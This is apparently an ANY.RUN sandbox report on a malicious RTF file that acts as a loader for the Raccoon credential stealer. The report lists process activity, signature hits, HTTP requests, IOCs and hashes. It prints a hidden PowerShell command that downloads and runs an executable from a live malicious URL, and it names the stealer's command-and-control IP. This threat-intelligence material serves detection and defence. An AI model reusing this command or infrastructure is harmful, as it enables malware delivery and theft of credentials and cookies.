analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0062_13012020.doc

Full analysis: https://app.any.run/tasks/d66838de-ea57-4dc8-81b1-26da14710bd9
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 13, 2020, 11:04:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
maldoc-13
trojan
opendir
loader
raccoon
stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

227149093595883E873B255625A9826F

SHA1:

24E4A1A22B6E3F24CE22C1BE855494223724E152

SHA256:

4B48814CE6E5414710884DFEC169D0CB7D1C9BEAF30C268324D57C8106A9B78C

SSDEEP:

1536:mhbKTRtnpTvJEdh61RVueReVeEeyfzf/PxtoKXngRPLgMNAKrNbui3FRIxPILSQN:mhAWPARmxgLSQWnA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Requests a remote executable file from MS Office

      • WINWORD.EXE (PID: 4084)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4084)

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 4084)

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 4084)

    • Application was dropped or rewritten from another process

      • cham.exe (PID: 2492)

    • RACCOON was detected

      • cham.exe (PID: 2492)

    • Connects to CnC server

      • cham.exe (PID: 2492)

    • Downloads executable files from the Internet

      • PowerShell.exe (PID: 2212)
      • cham.exe (PID: 2492)

    • Stealing of credential data

      • cham.exe (PID: 2492)

    • Loads dropped or rewritten executable

      • cham.exe (PID: 2492)

    • Downloads executable files from IP

      • cham.exe (PID: 2492)

    • Actions looks like stealing of personal data

      • cham.exe (PID: 2492)

  • SUSPICIOUS

    • Creates files in the program directory

      • WINWORD.EXE (PID: 4084)

    • Creates files in the user directory

      • PowerShell.exe (PID: 2212)
      • PowerShell.exe (PID: 736)

    • Reads the cookies of Google Chrome

      • cham.exe (PID: 2492)

    • Connects to server without host name

      • cham.exe (PID: 2492)

    • Executable content was dropped or overwritten

      • PowerShell.exe (PID: 2212)
      • cham.exe (PID: 2492)

    • Reads the cookies of Mozilla Firefox

      • cham.exe (PID: 2492)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4084)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4084)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe powershell.exe no specs powershell.exe #RACCOON cham.exe

Process information

PID
CMD
Path
Indicators
Parent process
4084"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0062_13012020.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
736PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://nileapi.com/wp-admin/network/files/cham.exe','C:\Users\admin\AppData\Roaming\cham.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cham.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2212PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://nileapi.com/wp-admin/network/files/cham.exe','C:\Users\admin\AppData\Roaming\cham.exe');Start-Process 'C:\Users\admin\AppData\Roaming\cham.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2492"C:\Users\admin\AppData\Roaming\cham.exe" C:\Users\admin\AppData\Roaming\cham.exe
PowerShell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
2 518
Read events
2 054
Write events
0
Delete events
0

Modification events

No data
Executable files
62
Suspicious files
6
Text files
12
Unknown types
3

Dropped files

PID
Process
Filename
Type
4084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDFA1.tmp.cvr
MD5:
SHA256:
4084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D48A0485.png
MD5:
SHA256:
736PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QDNZDCR07QKGEV0GKVXP.temp
MD5:
SHA256:
2212PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A4COWL8ESINLFGR2ZY3Q.temp
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\frAQBc8Wsa
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\1xVPfvJcrg
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\RYwTiizs2t
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\rQF69AzBla
MD5:
SHA256:
2492cham.exeC:\Users\admin\AppData\LocalLow\AdLibs\ff-funcs.zip
MD5:
SHA256:
736PowerShell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:8A68EEEFF0D4BBAC1340F8B846FC850B
SHA256:8CA2B0917DEC127BF875BFEEC6EB1807DDFF6E39F23B9FD7E88632B54712AA77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2492
cham.exe
POST
200
35.240.77.90:80
http://35.240.77.90/gate/log.php
US
text
399 b
malicious
2212
PowerShell.exe
GET
200
104.24.119.10:80
http://nileapi.com/wp-admin/network/files/cham.exe
US
executable
534 Kb
malicious
4084
WINWORD.EXE
GET
200
104.24.119.10:80
http://nileapi.com/wp-admin/network/files/cham.exe
US
executable
534 Kb
malicious
2492
cham.exe
GET
200
35.240.77.90:80
http://35.240.77.90/gate/libs.zip
US
compressed
2.70 Mb
malicious
2492
cham.exe
GET
200
35.240.77.90:80
http://35.240.77.90/gate/sqlite3.dll
US
executable
895 Kb
malicious
2492
cham.exe
POST
200
35.240.77.90:80
http://35.240.77.90/file_handler/file.php?hash=bbc9d7a6f17bbad87d7152ff996495692cff1bc4&js=09e0408a8dfbe00dfad868e00598726a95afc260&callback=http://35.240.77.90/gate
US
text
13 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2492
cham.exe
216.58.207.46:443
drive.google.com
Google Inc.
US
whitelisted
4084
WINWORD.EXE
104.24.119.10:80
nileapi.com
Cloudflare Inc
US
shared
2492
cham.exe
172.217.22.1:443
doc-10-cc-docs.googleusercontent.com
Google Inc.
US
whitelisted
2212
PowerShell.exe
104.24.119.10:80
nileapi.com
Cloudflare Inc
US
shared
2492
cham.exe
35.240.77.90:80
US
malicious

DNS requests

Domain
IP
Reputation
nileapi.com
  • 104.24.119.10
  • 104.24.118.10
malicious
drive.google.com
  • 216.58.207.46
shared
doc-10-cc-docs.googleusercontent.com
  • 172.217.22.1
shared

Threats

PID
Process
Class
Message
4084
WINWORD.EXE
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
4084
WINWORD.EXE
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
4084
WINWORD.EXE
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2212
PowerShell.exe
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
2212
PowerShell.exe
A Network Trojan was detected
AV TROJAN Possible infected Wordpress - Payload download attempt
2212
PowerShell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2212
PowerShell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2492
cham.exe
A Network Trojan was detected
AV TROJAN Trojan-Spy.MSIL.Stealer.ahp CnC Checkin
2492
cham.exe
A Network Trojan was detected
STEALER [PTsecurity] Stealer.Raccoon
2492
cham.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host DLL Request
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0062_13012020.doc